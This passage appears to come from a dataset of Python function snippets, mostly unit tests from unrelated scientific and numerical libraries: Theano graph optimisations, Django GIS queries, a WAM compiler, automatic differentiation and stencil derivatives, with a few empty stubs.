'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_grad_binary(func, motion, optimized, preserve_result, a, b):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, b)", "def test_coord_preceding_fs(self):", "def test_special_XYX(self, angexp):\n a, b, c, d = angexp[0]\n exp = {(\"rx\", \"ry\")[g]: angexp[1][g] for g in (0, 1) if angexp[1][g]}\n tgt = np.exp(1j * d) * RXGate(b).to_matrix() @ RYGate(a).to_matrix() @ RXGate(c).to_matrix()\n self.check_oneq_special_cases(tgt, \"XYX\", exp)", "def test_distance_indices(self):\n s1 = self.RNA(\"AUGC\")\n s2 = self.RNA(\"AAGC\")\n\n def f(x, y):\n if x == 2 or y == 2:\n return 10\n return 0\n\n self.assertEqual(s1.distance(s2, f, use_indices=True), 20)", "def test_directly_indexed_expression(self, fa, ti0, t0, exprs):\n eqs = EVAL(exprs, ti0.base, t0)\n op = Operator(eqs, dse='noop', dle='noop')\n trees = retrieve_iteration_tree(op)\n assert len(trees) == 2\n assert trees[0][-1].nodes[0].expr.rhs == eqs[0].rhs\n assert trees[1][-1].nodes[0].expr.rhs == eqs[1].rhs", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = 
numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_operators_functions_unavailable_for_geography(self):\n z = Zipcode.objects.get(code=\"77002\")\n point_field = \"%s.%s::geometry\" % (\n connection.ops.quote_name(City._meta.db_table),\n connection.ops.quote_name(\"point\"),\n )\n # ST_Within.\n qs = City.objects.filter(point__within=z.poly)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"ST_Within({point_field}\", ctx.captured_queries[0][\"sql\"])\n # @ operator.\n qs = City.objects.filter(point__contained=z.poly)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"{point_field} @\", ctx.captured_queries[0][\"sql\"])\n # ~= operator.\n htown = City.objects.get(name=\"Houston\")\n qs = City.objects.filter(point__exact=htown.point)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"{point_field} ~=\", ctx.captured_queries[0][\"sql\"])", "def tes_mod(self):\r\n x, y = ints('xy')\r\n fn = gof.DualLinker().accept(FunctionGraph([x,y], [x%y])).make_function()\r\n for a,b in ((0,1), (1,1), (0,-1), (1,-1), (-1,-1),\r\n (1,2), (-1,2), (1,-2), (-1,-2),\r\n (5,3), (-5,3), (5,-3), (-5,-3)\r\n ):\r\n self.assertTrue(fn(a,b) == a%b, (a,))", "def test_verify():\n Lx = 10; Ly = 10; c = 1.0\n\n def I(x, y):\n return exp(-pow(x-Lx/2.0,2)/2.0 -pow(y-Ly/2.0,2)/2.0)\n def f(x, y, t):\n return sin(2*x) + y\n def bc(x, y, t):\n return sin(t)\n\n # use string formulas instead so also weave can be tested:\n # (need to transfer globals() so that vectorized versions work)\n I = StringFunction('exp(-pow(x-Lx/2.0,2)/2.0 - pow(y-Ly/2.0,2)/2.0)',\n independent_variables=('x', 'y'),\n Lx=Lx, Ly=Ly, globals=globals())\n f = StringFunction('sin(2*x) + y',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n bc = StringFunction('sin(t)',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n\n #nx = 15; ny = 10; tstop = 2\n nx = 4; ny = 3; tstop = 16\n verify_implementations(I, f, c, bc, Lx, Ly, nx, ny, tstop)", "def test_ex_2_5(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n program_reg_allocation = RegisterAllocation()\n program_instrs = compiler.compile_program(program, program_reg_allocation)\n\n wam = WAM()\n wam.execute(query_instrs)\n wam.execute(program_instrs)\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def intersection(x, y, f, p):", "def test_pow_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = x**3 + y**3\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), 0.0)\n 
assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2), 9.0)\n assert equals(f.derivative_at((y, y), {x: 1.5, y:2.5}, order=2), 15.0)\n f = (x-y)**3\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n -6.0*(1.5-2.5))", "def test_ex_2_3(self):\n\n wam = WAM()\n wam.execute(self.fig_2_3_instrs)\n aW = wam.deref_reg(5)\n aZ = wam.deref_reg(2)\n wam.execute(self.fig_2_4_instrs)\n aX = wam.deref_reg(5)\n aY = wam.deref_reg(4)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def structured_pow(x, y):\r\n # see decorator for function body\r", "def test_get_functions(sersic_2d_image,segm_and_cat):\n cat, segm, segm_deblend = segm_and_cat\n\n base_source = cat[0]\n\n source = base_source\n\n assert pf.get_source_position(source) == (base_source.maxval_xindex, base_source.maxval_yindex)\n assert pf.get_source_elong(source) == base_source.elongation.value\n assert pf.get_source_ellip(source) == base_source.ellipticity.value\n assert pf.get_source_theta(source) == base_source.orientation.to('rad').value\n\n x0, y0 = pf.get_source_position(source)\n ellip, theta = pf.get_source_ellip(source), pf.get_source_theta(source)\n\n assert np.round(pf.get_amplitude_at_r(200, sersic_2d_image, x0, y0 , ellip, theta), 6) == 0.036798", "def bitwise_stats(traces, N, delta):\n \n X = np.zeros((N,),dtype=int)\n padded_traces = pad_traces(traces, N)\n num_traces = padded_traces.shape[0]\n \n p = np.zeros(N)\n for j in range(N):\n p[j] = np.sum(padded_traces[:,j])/num_traces\n \n c = np.concatenate((np.ones(N,), np.zeros(N,)), axis=None)\n bounds = (0,1)\n \n for i in range(N):\n A_ub = np.zeros((2*N,2*N))\n for j in range(N):\n for k in range(N):\n if j == k:\n A_ub[j,k] = -1\n A_ub[j+N,k] = -1\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n elif k > j:\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n \n b_ub = np.concatenate((p,-1*p), axis=None)\n \n A_eq0 = np.zeros((i+1,2*N))\n b_eq0 = np.zeros(i+1)\n for j in range(i+1):\n A_eq0[j,j+N] = 1\n if j==i:\n b_eq0[j] = 0\n else:\n b_eq0[j] = X[j]\n \n A_eq1 = np.zeros((i+1,2*N))\n b_eq1 = np.zeros(i+1)\n for j in range(i+1):\n A_eq1[j,j+N] = 1\n if j==i:\n b_eq1[j] = 1\n else:\n b_eq1[j] = X[j]\n \n res0 = linprog(c,A_ub,b_ub,A_eq0,b_eq0,bounds,method='interior-point')\n res1 = linprog(c,A_ub,b_ub,A_eq1,b_eq1,bounds,method='interior-point')\n if res0.fun < res1.fun:\n X[i] = 0\n else:\n X[i] = 1\n \n return X", "def intersect(f, df, g, dg):\n \"*** YOUR CODE HERE ***\"", "def pyelemfunctions():\n for elemid in unique(top.idpyelem[:top.nppyelem]):\n ip = (top.idpyelem[:top.nppyelem] == elemid)\n x = top.xpyelem[:top.nppyelem][ip]\n y = top.ypyelem[:top.nppyelem][ip]\n z = top.zpyelem[:top.nppyelem][ip]\n # --- The conversion to int is needed since a numpy.int64 is different than an int.\n (ex,ey,ez,bx,by,bz) = pyelemfunctionsdict[int(elemid)](x,y,z)\n top.expyelem[:top.nppyelem][ip] = ex\n top.eypyelem[:top.nppyelem][ip] = ey\n top.ezpyelem[:top.nppyelem][ip] = ez\n top.bxpyelem[:top.nppyelem][ip] = bx\n top.bypyelem[:top.nppyelem][ip] = by\n top.bzpyelem[:top.nppyelem][ip] = bz", "def loc_eval(x, b):\r\n loc_est = 0\r\n for i in enumerate(b): loc_est+=i[1]*(x**i[0])\r\n return(loc_est)", "def test_elemwise2():\r\n rng = 
numpy.random.RandomState(int(time.time()))\r\n shape = (3, 5)\r\n for pattern in [(0, 1), (1, 0)]:\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), name=None)\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle(pattern))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32') * .3)\r\n\r\n shape = (3, 4, 5, 6)\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle([2, 0, 3, 1]) *\r\n tensor.exp(b ** a).dimshuffle([2, 0, 3, 1]))], mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32'))", "def test_advanced_manipulations(free_alg):\n dr = free_alg\n p = dr.names\n i, j, k = p.i, p.j, p.k\n\n u = IndexedBase('u')\n v = IndexedBase('v')\n f = Vec('f')\n\n tensor = dr.einst(u[i, j] * f[j] + v[i, j] * f[j])\n assert tensor.n_terms == 2\n\n def has_u(term):\n \"\"\"Test if a term have u tensor.\"\"\"\n return term.amp.has(u)\n\n expect = dr.sum((j, p.R), u[i, j] * f[j])\n for res in [\n tensor.filter(has_u),\n tensor.bind(lambda x: [x] if has_u(x) else [])\n ]:\n assert res.n_terms == 1\n assert res == expect\n\n def subst_i(term):\n \"\"\"Substitute i index in the terms.\"\"\"\n return Term(term.sums, term.amp.xreplace({i: k}), term.vecs)\n\n expect = dr.sum((j, p.R), u[k, j] * f[j] + v[k, j] * f[j])\n for res in [\n tensor.map(subst_i),\n tensor.bind(lambda x: [subst_i(x)]),\n tensor.map2scalars(lambda x: x.xreplace({i: k}))\n ]:\n assert res.n_terms == 2\n assert res == expect\n\n alpha, beta = symbols('alpha beta')\n assert tensor.bind(\n lambda x: [Term(x.sums, x.amp * i_, x.vecs) for i_ in [alpha, beta]]\n ) == (tensor * alpha + tensor * beta)\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k})\n ) == dr.sum((j, p.R), u[i, k] * f[k] + v[i, k] * f[k])\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k}), skip_vecs=True\n ) == dr.sum((j, p.R), u[i, k] * f[j] + v[i, k] * f[j])", "def test_AND():\n\tk, outputs = 2, [0,0,0,1]\n\t# Prime Implicants\n\ttrue_pi0s = set(['02','20'])\n\ttrue_pi1s = set(['11'])\n\n\ttdt0, tdt1 = make_transition_density_tables(k=k, outputs=outputs)\n\tpi0s, pi1s = find_implicants_qm(tdt0) , find_implicants_qm(tdt1)\n\n\tassert (pi0s == true_pi0s) , ('Prime Implicants for 0 does not match. %s != %s' % (pi0s,true_pi0s))\n\tassert (pi1s == true_pi1s) , ('Prime Implicants for 1 does not match. %s != %s' % (pi1s,true_pi1s))\n\t# Two Symbols\n\ttrue_ts0s = [('02',[[0,1]],[])]\n\ttrue_ts1s = [('11',[],[[0,1]])]\n\n\tts0s,ts1s = find_two_symbols_v2(k=k, prime_implicants=pi0s) , find_two_symbols_v2(k=k, prime_implicants=pi1s)\n\n\tassert (ts0s == true_ts0s) , ('Two Symbol for 0 does not match. %s != %s' % (ts0s,true_ts0s))\n\tassert (ts1s == true_ts1s) , ('Two Symbol for 1 does not match. 
%s != %s' % (ts1s,true_ts1s))", "def test_expression(x, y, z):\n return x * y + y / z", "def test_ex_2_7(self):\n\n wam = WAM()\n wam.execute(self.fig_2_9_instrs[:-1]) # last instruction is call; remove it\n wam.execute(self.fig_2_10_instrs)\n aW = wam.deref_reg(4)\n aX = wam.deref_reg(4)\n aY = wam.deref_reg(5)\n aZ = wam.deref_reg(1)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_binops(self):", "def test_grad_binary_int(func, motion, optimized, preserve_result, a, n):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, n)", "def test_indexed_increment(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base\n fa = a.function\n fa.data[1:, 1:] = 0\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_ex_2_9(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query_m1(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n # Because there is a shared register space, we reuse the query's register allocation to\n # force the program's registers into different slots.\n program_reg_allocation = query_reg_allocation # RegisterAllocation()\n program_instrs = compiler.compile_program_m1(program, program_reg_allocation)\n program_instrs = program_instrs[:-1] # last instruction is proceed; remove it\n\n wam = WAM()\n wam.load(None, query_instrs)\n wam.load(program.get_functor(), program_instrs)\n wam.run()\n\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n\n #print 'X reg:', query_reg_allocation.reg_allocation[X], 'X addr:', aX, 'X: ', wam.get_term_repr(aX)\n #print 'Y reg:', query_reg_allocation.reg_allocation[Y], 'Y addr:', aY, 'Y: ', wam.get_term_repr(aY)\n #print 'Z reg:', program_reg_allocation.reg_allocation[Z], 'Z addr:', aZ, 'Z: ', wam.get_term_repr(aZ)\n #print 'W reg:', program_reg_allocation.reg_allocation[W], 'W addr:', aW, 'W: ', wam.get_term_repr(aW)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_vec_func2():\n\n c = [1,2]\n p = [1,1]\n def myfunc(x,y):\n a = EF.exp_base(2,x) #base 2 and exponent x\n b = EF.logistic(y)\n c = EF.log(y,2) #log with base 2\n return a + b + c\n\n f_obj=ADiff(myfunc)\n res=f_obj.pJac(c,p)\n\n expectAns={'diff': math.pow(2,c[0])+1/(1 + math.exp(-c[1]))*(1-(1/(1 + math.exp(-c[1]))))+1/((c[1])*math.log(2)), 'value': math.pow(2,c[0])+(1 / (1 + math.exp(-c[1])))+math.log(c[1],2)}\n\n assert res==expectAns", "def test_elemwise_multiple_inputs_optimisation2(self):\r\n raise SkipTest(\"Current implementation of Canonizer does not \"\r\n \"implement all cases. 
Skip the corresponding test.\")\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx + dy + dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx * dy * dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * (fx + fy + fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (dx * dy * (dx + dy + dz), (dx, dy, dz), (dxv, dyv,\r\n dzv), 2, 'float64'),\r\n (fx * fy * (fx + fy + dz), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type add\r\n (dz * fy * (fx + fy), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 * fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (fx * fy * 2 * (fx+fy+fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (fx*fy*(2+fx+fy+fz), (fx, fy, fz), (fxv, fyv, fzv), 2, 'float32'),\r\n (fx*fy*2*(fx+fy+fz+2), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n\r\n #check with broadcast of row\r\n (fx+fy+fz+fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fz*fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv+fx+fy+fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv*fx*fy*fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fv*(fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*fv*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 2, 'float32'),\r\n (dx+dy+dz+dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dz*dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv+dx+dy+dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv*dx*dy*dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dv*(dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*dv*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 2, 'float64'),\r\n\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide 
bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding('local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)", "def test_sum_pos_3() -> None:\n # 2nd step - 3rd square\n assert nth(sw.sum_walk(), 1) == 2", "def test_generate_condition_function():\n masks = 4 # Always > 2\n vals = 15\n np_masks = np.random.randint(2, size=(masks, vals), dtype=bool)\n tf_masks = [tf.constant(i, dtype=tf.bool) for i in np_masks]\n # Generate the functions for and and or\n f_and = generate_condition_function(masks, \"and\")\n f_or = generate_condition_function(masks, \"or\")\n # Get the numpy and tf results\n np_ands = np.all(np_masks, axis=0)\n np_ors = np.any(np_masks, axis=0)\n tf_ands, idx_ands = f_and(*tf_masks)\n tf_ors, idx_ors = f_or(*tf_masks)\n # Check the values are the same\n util_check(np_ands, tf_ands, idx_ands)\n util_check(np_ors, tf_ors, idx_ors)\n # Check a combination\n f_comb = generate_condition_function(3, [\"and\", \"or\"])\n np_comb = np_masks[0] & np_masks[1] | np_masks[2]\n tf_comb, idx_comb = f_comb(*tf_masks[:3])\n util_check(np_comb, tf_comb, idx_comb)\n # Check failures\n with pytest.raises(ValueError):\n generate_condition_function(1, \"and\")\n with pytest.raises(ValueError):\n generate_condition_function(5, \"bad_condition\")\n with pytest.raises(ValueError):\n generate_condition_function(5, [\"or\", \"and\"])\n with pytest.raises(ValueError):\n generate_condition_function(3, [\"or\", \"bad_condition\"])", "def test_stencil_derivative(grid, shape, SymbolType, dim):\n i = dim(grid) # issue fixtures+parametrize: github.com/pytest-dev/pytest/issues/349\n u = SymbolType(name='u', grid=grid)\n u.data[:] = 66.6\n di = u.diff(i)\n dii = u.diff(i, i)\n # Check for sympy Derivative objects\n assert(isinstance(di, Derivative) and isinstance(dii, Derivative))\n s_di = di.as_finite_difference([i - i.spacing, i])\n s_dii = dii.as_finite_difference([i - i.spacing, i, i + i.spacing])\n # Check stencil length of first and second derivatives\n assert(len(s_di.args) == 2 and len(s_dii.args) == 3)\n u_di = s_di.args[0].args[1]\n u_dii = s_di.args[0].args[1]\n # Ensure that devito meta-data survived symbolic transformation\n assert(u_di.grid.shape == shape and u_dii.grid.shape == shape)\n assert(u_di.shape == u.shape and u_dii.shape == u.shape)\n assert(np.allclose(u_di.data, 66.6))\n assert(np.allclose(u_dii.data, 66.6))", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def ED(X,Y):", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = 
\"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def test_pow_2ndord():\n # one variable\n x = fwd.Variable()\n f = (x+1)**3\n assert equals(f.derivative_at(x, {x: 2.0}, order=2), 18.0)\n # two variables\n x, y = fwd.Variable(), fwd.Variable()\n g = (x+y)**3\n assert equals(g.derivative_at(x, {x: 2.0, y: 1.0}, order=2), 18.0)\n # test error raising\n with pytest.raises(NotImplementedError):\n g.derivative_at(x, {x:1.0, y: 2.0}, order=3)", "def test_2d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(point):\n x, y = point\n return [x**2, y]\n \n a = func((1, 1))\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, [1**2, 1])\n \n a = func((2, 1))\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, [2**2, 1])\n \n a = func((1, 2))\n self.assertEqual(len(self.storage), 3)\n self.assertEqual(a, [1**2, 2])\n \n a = func((2, 2))\n self.assertEqual(len(self.storage), 4)\n self.assertEqual(a, [2**2, 2])\n \n a = func((1.5, 1.5))\n self.assertEqual(len(self.storage), 